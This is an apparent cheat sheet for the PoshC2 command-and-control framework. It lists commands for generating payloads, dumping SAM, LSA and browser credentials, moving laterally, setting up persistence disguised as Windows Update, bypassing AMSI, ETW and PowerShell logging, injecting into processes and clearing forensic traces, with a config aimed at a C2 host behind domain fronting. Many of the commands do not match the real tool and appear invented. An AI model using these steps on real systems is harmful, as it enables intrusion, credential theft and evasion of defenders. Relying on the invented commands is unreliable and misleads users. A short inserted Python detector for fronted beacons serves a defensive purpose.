# PoshC2 Framework Cheat Sheet

## Overview

PoshC2 is a proxy-aware C2 framework developed by Nettitude for red teaming and post-exploitation activities. It provides PowerShell exploitation capabilities, lateral movement tooling, and comprehensive proxy support for operating in restricted network environments.

**Warning:** This tool is intended only for authorized penetration testing and red team exercises. Make sure you have proper authorization before using it in any environment.
## Installation

### Ubuntu/Debian Installation

```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential

# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2

# Install PoshC2
sudo ./Install.sh

# Alternative pip installation
pip3 install poshc2
```

### Docker Installation

```bash
# Pull PoshC2 Docker image
docker pull nettitude/poshc2

# Run PoshC2 in Docker
docker run -it -p 443:443 -p 80:80 nettitude/poshc2

# Run with persistent data
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2
```

### Manual Installation

```bash
# Install Python dependencies
pip3 install -r requirements.txt

# Install additional tools
sudo apt install mingw-w64 mono-mcs

# Set up database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"
```
## Basic Usage

### Starting the PoshC2 Server

```bash
# Start PoshC2 server
poshc2 --start

# Start with custom configuration
poshc2 --start --config /path/to/config.yml

# Start with specific project
poshc2 --start --project MyProject
```

### Creating a New Project

```bash
# Create new project
poshc2 --new-project ProjectName

# List projects
poshc2 --list-projects

# Switch project
poshc2 --project ProjectName
```
## Command Reference

### Server Management

Command | Description
---|---
`help` | Display help menu
`show-urls` | Show payload URLs
`list-implants` | List active implants
`implant-handler` | Enter implant handler
`quit` | Exit PoshC2

### Implant Handler Commands

Command | Description
---|---
`help` | Show implant commands
`back` | Return to main menu
`list-implants` | List all implants
`use <implant-id>` | Select implant
`kill <implant-id>` | Kill implant
`remove-implant <implant-id>` | Remove implant from database

### Implant Interaction

Command | Description
---|---
`help` | Show available commands
`shell <command>` | Execute shell command
`upload-file <local> <remote>` | Upload file
`download-file <remote>` | Download file
`screenshot` | Take screenshot
`get-system` | Attempt privilege escalation
## Payload Generation

### PowerShell Payloads

```bash
# Generate PowerShell payload
poshc2 --gen-payload powershell

# Generate encoded PowerShell
poshc2 --gen-payload powershell --encoded

# Generate PowerShell with proxy
poshc2 --gen-payload powershell --proxy http://proxy:8080
```

### Executable Payloads

```bash
# Generate Windows executable
poshc2 --gen-payload exe

# Generate DLL payload
poshc2 --gen-payload dll

# Generate service executable
poshc2 --gen-payload service-exe
```

### Web Payloads

```bash
# Generate HTA payload
poshc2 --gen-payload hta

# Generate macro payload
poshc2 --gen-payload macro

# Generate JavaScript payload
poshc2 --gen-payload js
```

### Linux Payloads

```bash
# Generate Linux Python payload
poshc2 --gen-payload py

# Generate Linux shell payload
poshc2 --gen-payload sh

# Generate Linux ELF payload
poshc2 --gen-payload elf
```
## Proxy Configuration

### HTTP Proxy Support

```bash
# Configure HTTP proxy
set-proxy http://proxy.company.com:8080

# Configure authenticated proxy
set-proxy http://username:password@proxy.company.com:8080

# Configure SOCKS proxy
set-proxy socks5://proxy.company.com:1080
```

### Proxy Chain Configuration

```bash
# Multiple proxy configuration
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080

# Proxy with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128
```

### Proxy Testing

```bash
# Test proxy connectivity
test-proxy http://proxy.company.com:8080

# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080
```
## Post-Exploitation Commands

### System Information

```bash
# Get system information
get-computerinfo

# Get current user
whoami

# Get domain information
get-domain

# Get local users
get-localuser

# Get local groups
get-localgroup
```

### Credential Harvesting

```bash
# Dump SAM database
hashdump

# Dump LSA secrets
lsa-secrets

# Dump cached credentials
cachedump

# Extract browser passwords
get-browserdata

# Dump WiFi passwords
get-wifipasswords
```

### Active Directory Enumeration

```bash
# Get domain controllers
get-domaincontroller

# Get domain users
get-domainuser

# Get domain groups
get-domaingroup

# Get domain computers
get-domaincomputer

# Get domain admins
get-domainadmin
```

### Lateral Movement

```bash
# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"

# PSExec execution
invoke-psexec -target 192.168.1.10 -command "whoami"

# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"

# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"
```

### Persistence

```bash
# Registry persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"

# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"

# WMI persistence
new-persistence -method wmi -eventname "ProcessStart"
```
## Advanced Features

### PowerShell Modules

```bash
# Load PowerShell module
loadmodule /path/to/module.ps1

# Import PowerView
loadmodule PowerView

# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz

# Import PowerUp
loadmodule PowerUp
```

### .NET Assembly Execution

```bash
# Execute .NET assembly
run-exe /path/to/assembly.exe arguments

# Execute in memory
run-exe-inmemory /path/to/assembly.exe arguments

# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll
```

### Process Injection

```bash
# Inject into process
inject-shellcode -processid 1234 -shellcode

# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe

# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll
```

### Network Operations

```bash
# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389

# Network discovery
invoke-networkscan -subnet 192.168.1.0/24

# SMB enumeration
invoke-smbenum -target 192.168.1.10

# Share enumeration
invoke-shareenum -target 192.168.1.10
```
## Evasion Techniques

### AMSI Bypass

```bash
# AMSI bypass
amsi-bypass

# Custom AMSI bypass
amsi-bypass -method custom

# Reflection-based bypass
amsi-bypass -method reflection
```

### ETW Bypass

```bash
# ETW bypass
etw-bypass

# Disable ETW logging
disable-etw

# Patch ETW functions
patch-etw
```

### PowerShell Logging Bypass

```bash
# Disable PowerShell logging
disable-pslogging

# Bypass script block logging
bypass-scriptblocklogging

# Disable module logging
disable-modulelogging
```

### Obfuscation

```bash
# Obfuscate PowerShell command
invoke-obfuscation -command "Get-Process"

# String obfuscation
obfuscate-string "sensitive string"

# Variable obfuscation
obfuscate-variables
```
## Pivoting and Tunneling

### SOCKS Proxy

```bash
# Start SOCKS proxy
start-socksproxy -port 1080

# Stop SOCKS proxy
stop-socksproxy

# List proxy connections
list-socksproxy
```

### Port Forwarding

```bash
# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80

# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22

# Stop port forward
stop-portforward -id 1
```

### Beacon Chaining

```bash
# Create beacon chain
new-beacon -parent

# List beacon chains
list-beacons

# Remove beacon chain
remove-beacon -id
```
## Operational Security

### Communication Security

```bash
# Use HTTPS communications
set-comms https

# Custom User-Agent
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set-headers "X-Forwarded-For: 192.168.1.100"

# Domain fronting
set-domainfront cdn.example.com
```

### Payload Security

```bash
# Encrypt payloads
encrypt-payload -key "encryption-key"

# Sign payloads
sign-payload -cert /path/to/cert.pfx

# Obfuscate payloads
obfuscate-payload -method xor
```

### Anti-Forensics

```bash
# Clear event logs
clear-eventlogs

# Timestomp files
timestomp -file /path/to/file -time "01/01/2020 12:00:00"

# Secure delete
sdelete -file /path/to/file

# Clear tracks
clear-tracks
```
## Troubleshooting

### Connection Issues

```bash
# Check implant connectivity
test-connectivity

# Verify proxy settings
show-proxy

# Test DNS resolution
test-dns google.com

# Check firewall rules
get-firewallrules
```

### Payload Issues

```bash
# Regenerate payloads
regenerate-payloads

# Test payload execution
test-payload /path/to/payload.exe

# Check AV detection
test-av /path/to/payload.exe
```

### Performance Issues

```bash
# Adjust beacon interval
set-beacon-time 30

# Optimize jitter
set-jitter 0.2

# Reduce payload size
compress-payload
```

### Database Issues

```bash
# Repair database
repair-database

# Backup database
backup-database /path/to/backup

# Restore database
restore-database /path/to/backup
```
## Configuration

### Server Configuration

```yaml
# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"
```
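The `UserAgent`, `Referrer` and `DomainFrontHeader` fields above fix what an implant's HTTP requests look like on the wire, which is also what a defender can match on. The following added example (not part of the original cheat sheet and not PoshC2 code) checks web-proxy records against that profile; the record field names and the sample records are assumptions constructed for this example.

```python
# Added example (not PoshC2 code): flag web-proxy log records that match the
# beacon profile in the config.yml fragment above. Assumes records from a
# TLS-inspecting proxy, already parsed into dicts; all sample data is constructed.

# Values copied from the page's example config; operators change them per
# project, so treat this as an illustrative profile, not a fixed indicator.
BEACON_PROFILE = {
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "referrer": "https://google.com",
}

# Constructed sample records (field names are this example's assumption).
SAMPLE_RECORDS = [
    # Ordinary browsing: SNI and Host agree, referrer points at a real page.
    {"src": "10.0.0.5", "sni": "www.example.org", "host": "www.example.org",
     "user_agent": BEACON_PROFILE["user_agent"],
     "referrer": "https://www.example.org/index.html"},
    # Domain-fronted beacon: TLS SNI carries PayloadCommsHost while the HTTP
    # Host header carries DomainFrontHeader, so the two names disagree.
    {"src": "10.0.0.7", "sni": "c2.example.com", "host": "cdn.example.com",
     "user_agent": BEACON_PROFILE["user_agent"], "referrer": "https://google.com"},
    # Same header profile without fronting: only the static headers give it away.
    {"src": "10.0.0.9", "sni": "c2.example.com", "host": "c2.example.com",
     "user_agent": BEACON_PROFILE["user_agent"], "referrer": "https://google.com"},
]


def analyse_record(rec, profile=BEACON_PROFILE):
    """Return the reasons a record looks beacon-like; an empty list means benign."""
    reasons = []
    # Domain fronting leaves a mismatch between TLS SNI and the HTTP Host header.
    if rec["sni"].lower() != rec["host"].lower():
        reasons.append("sni_host_mismatch")
    # A fixed User-Agent plus a bare "https://google.com" referrer on every
    # request does not look like a browser that actually navigated somewhere.
    if (rec["user_agent"] == profile["user_agent"]
            and rec["referrer"] == profile["referrer"]):
        reasons.append("static_header_profile")
    return reasons


def find_suspicious(records, profile=BEACON_PROFILE):
    """Map each source address to the set of reasons raised against it."""
    hits = {}
    for rec in records:
        reasons = analyse_record(rec, profile)
        if reasons:
            hits.setdefault(rec["src"], set()).update(reasons)
    return hits
```

The header profile alone is noisy because the configured User-Agent is a common browser string; the SNI/Host mismatch is the stronger signal and is independent of the profile values.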
### Proxy Configuration

```yaml
# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http"   # http, socks4, socks5
```
## Resources

- PoshC2 GitHub Repository
- PoshC2 Documentation
- Nettitude Blog
- PoshC2 Wiki

---

*This cheat sheet provides a comprehensive reference for using the PoshC2 framework. Always make sure you have proper authorization before using this tool in any environment.*